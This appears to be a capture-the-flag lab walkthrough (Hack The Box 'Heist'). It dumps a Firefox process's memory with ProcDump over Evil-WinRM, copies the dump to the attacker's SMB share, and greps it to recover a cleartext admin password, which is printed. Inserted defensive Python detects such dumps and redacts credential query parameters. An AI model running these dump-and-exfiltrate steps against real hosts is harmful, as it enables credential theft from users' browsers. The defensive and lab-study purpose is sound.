Firefox


During the initial foothold, Firefox was already present on the target system, and the system firewall has an inbound rule allowing Firefox traffic.

*Evil-WinRM* PS C:\Users\Chase\Documents> ps firefox
 
Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    349      20    10268      35720       0.11    752   1 firefox
    410      34    26616      84752       1.48   5424   1 firefox
   1076      64   113608     201968       4.42   5724   1 firefox
    391      29    22372      59040       1.05   6224   1 firefox
    360      25    16528      39196       0.14   6928   1 firefox

There are 5 running instances.

PEAS also found the Firefox installation as well as the credential file. Unfortunately, that led nowhere, as the files that store saved logins (logins.json or signons.sqlite) were not found.

I can try dumping process memory instead.

Procdump.exe


While there are many tools available for memory dumping, I will go with the standard Microsoft-sponsored tool, procdump.exe from Sysinternals.

*Evil-WinRM* PS C:\Users\Chase\Documents> \\10.10.14.3\smb\procdump.exe -accepteula firefox

ProcDump v10.11 - Sysinternals process dump utility
Copyright (C) 2009-2021 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[16:55:44] Multiple processes match the specified name.

I can't just run it against the process name, as there are 5 instances of Firefox; ProcDump needs a single target, so I have to give it a PID.

*Evil-WinRM* PS C:\Users\Chase\Documents> \\10.10.14.3\smb\procdump.exe -accepteula -ma 752 firefox752.dmp
 
ProcDump v10.11 - Sysinternals process dump utility
Copyright (C) 2009-2021 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com
 
[17:23:47] Dump 1 initiated: C:\Users\Chase\Documents\firefox752.dmp
[17:23:47] Dump 1 writing: Estimated dump file size is 288 MB.
[17:23:47] Dump 1 complete: 288 MB written in 0.3 seconds
[17:23:47] Dump count reached.

The first dump is done; it is of the instance with PID 752.
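From the defensive side, the dump step above leaves a clear trail in process-creation telemetry: a known dump utility, run with -ma against a browser PID, launched from a UNC path on the attacker's share, inside a WinRM session. The following is an added example, not code from the write-up, showing that detection logic run over constructed Sysmon-style ProcessCreate records. The flattened key=value record layout, the sample values and the wsmprovhost.exe parent (how commands run through WinRM normally appear) are my assumptions about what such telemetry would contain.

```python
import re

# Tools that can write a full process memory image (as they appear in Image).
DUMP_TOOLS = {"procdump.exe", "procdump64.exe"}
# Browser process names whose memory routinely holds session data and credentials.
BROWSERS = {"firefox", "firefox.exe", "chrome", "chrome.exe", "msedge", "msedge.exe"}

# Constructed sample records (not real telemetry): Sysmon Event ID 1 style,
# flattened to key=value pairs separated by '|'. The first mirrors the ProcDump
# command line used in the write-up; the WinRM parent (wsmprovhost.exe) is an
# assumption about how an Evil-WinRM session would appear.
SAMPLE_EVENTS = [
    r"EventID=1|ProcessId=4412|Image=\\10.10.14.3\smb\procdump.exe|CommandLine=\\10.10.14.3\smb\procdump.exe -accepteula -ma 752 firefox752.dmp|ParentImage=C:\Windows\System32\wsmprovhost.exe",
    r"EventID=1|ProcessId=5424|Image=C:\Program Files\Mozilla Firefox\firefox.exe|CommandLine=firefox.exe -contentproc|ParentImage=C:\Program Files\Mozilla Firefox\firefox.exe",
    r"EventID=1|ProcessId=4500|Image=C:\Tools\procdump.exe|CommandLine=procdump.exe -accepteula -ma firefox|ParentImage=C:\Windows\System32\cmd.exe",
    r"EventID=1|ProcessId=4510|Image=C:\Windows\System32\notepad.exe|CommandLine=notepad.exe report.txt|ParentImage=C:\Windows\explorer.exe",
]


def parse_event(line):
    """Split one flattened record into a dict of field -> value."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def analyze(event):
    """Return the reasons this process-creation event looks like a memory-dump
    attempt against a browser (empty list when nothing matches)."""
    reasons = []
    image = event.get("Image", "")
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentImage", "")
    exe = image.rsplit("\\", 1)[-1].lower()

    if exe in DUMP_TOOLS:
        reasons.append("known process-dump tool")
        # -ma asks ProcDump for a full memory dump rather than a minidump.
        if re.search(r"(^|\s)-ma(\s|$)", cmd):
            reasons.append("full memory dump requested (-ma)")
        tokens = [t.lower() for t in cmd.split()]
        if any(t in BROWSERS or t.endswith(".dmp") for t in tokens):
            reasons.append("browser process or .dmp output named on command line")
    if image.startswith("\\\\"):
        reasons.append("executable launched from a UNC path")
    if parent.lower().endswith("\\wsmprovhost.exe"):
        reasons.append("spawned under a WinRM session")
    return reasons


def scan(lines):
    """Map ProcessId -> reasons for every record that raised at least one flag."""
    flagged = {}
    for line in lines:
        event = parse_event(line)
        reasons = analyze(event)
        if reasons:
            flagged[int(event["ProcessId"])] = reasons
    return flagged


if __name__ == "__main__":
    for pid, reasons in scan(SAMPLE_EVENTS).items():
        print(f"PID {pid}: " + "; ".join(reasons))
```

Run against the samples, only the two ProcDump launches are flagged; the one from the UNC path under WinRM collects all five reasons, which is the combination worth alerting on with high priority, while the firefox.exe child process and notepad produce nothing.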

*Evil-WinRM* PS C:\Users\Chase\Documents> copy firefox752.dmp \\10.10.14.3\smb\firefox752.dmp

I transferred the first memory dump to Kali over SMB.

┌──(kali㉿kali)-[~/…/htb/labs/heist/memorydump]
└─$ file firefox752.dmp 
firefox752.dmp: Mini DuMP crash report, 19 streams, Wed Jan 11 11:53:47 2023, 0x461826 type
 
┌──(kali㉿kali)-[~/…/htb/labs/heist/memorydump]
└─$ ll firefox752.dmp 
281M -rwxr-xr-x 1 kali kali 281M Jan 11 12:53 firefox752.dmp

It's extremely large, at 281 MB.

┌──(kali㉿kali)-[~/…/htb/labs/heist/memorydump]
└─$ strings firefox752.dmp | grep -i password* | grep -i login.php
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
RG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=

DAMN. It took me a while, but I figured it out.

The most important thing when going through massive files is choosing the right keywords. I was initially checking for "password" or "username", which returned a few THOUSAND lines of strings containing them.

Then I realized that this is a memory dump of a Firefox instance, which narrowed the keywords down significantly.

This section of the memory dump is a POST request to the login.php file with data containing the CLEARTEXT credential for the admin user: 4dD!5}x/re8]FBuZ. I can validate this against the hash extracted earlier.
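What made the credential recoverable is that it sits in the URL's query string, which is how it surfaced in the process environment (MOZ_CRASHREPORTER_RESTART_ARG_1) and would equally appear in web-server, proxy and browser-history records. As an added example, not code from the write-up, here is a small scanner that finds credential-bearing query parameters in log lines and redacts them before the lines are stored or shared. The sample lines are constructed: the first is modelled on the environment string above with the real password replaced by a placeholder, and the others imitate access-log request lines.

```python
import re
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

# Substrings that mark a query parameter as credential-bearing.
SENSITIVE_PARAM_HINTS = ("password", "passwd", "pwd", "secret", "token")

# Matches a URL-like token that carries a query string.
URL_RE = re.compile(r"[\w.:/\-]+\?[^\s\"']+")

# Constructed sample lines (not real logs). The password value is a placeholder.
SAMPLE_LINES = [
    "MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=example-secret&login=",
    "GET /index.php?page=home HTTP/1.1",
    "GET /login.php?login_username=bob&login_password=example-secret-2 HTTP/1.1",
]


def _is_sensitive(name):
    return any(hint in name.lower() for hint in SENSITIVE_PARAM_HINTS)


def find_sensitive_params(url):
    """Names of query parameters in url that look like credentials."""
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    return [name for name, _ in pairs if _is_sensitive(name)]


def redact_url(url):
    """Return url with credential-bearing parameter values replaced."""
    parts = urlsplit(url)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    cleaned = [(n, "[REDACTED]" if _is_sensitive(n) else v) for n, v in pairs]
    # safe= keeps the brackets and the '@' in the username readable in the output.
    return urlunsplit(parts._replace(query=urlencode(cleaned, safe="[]@")))


def scan_lines(lines):
    """(line number, sensitive parameter names, redacted URL) for each hit."""
    findings = []
    for number, line in enumerate(lines, start=1):
        for url in URL_RE.findall(line):
            names = find_sensitive_params(url)
            if names:
                findings.append((number, names, redact_url(url)))
    return findings


if __name__ == "__main__":
    for number, names, clean in scan_lines(SAMPLE_LINES):
        print(f"line {number}: {', '.join(names)} -> {clean}")
```

The same check belongs in the application itself: a login form that submits over GET puts the password into every URL-handling component along the path, whereas a POST body with credentials never reaches the query string in the first place.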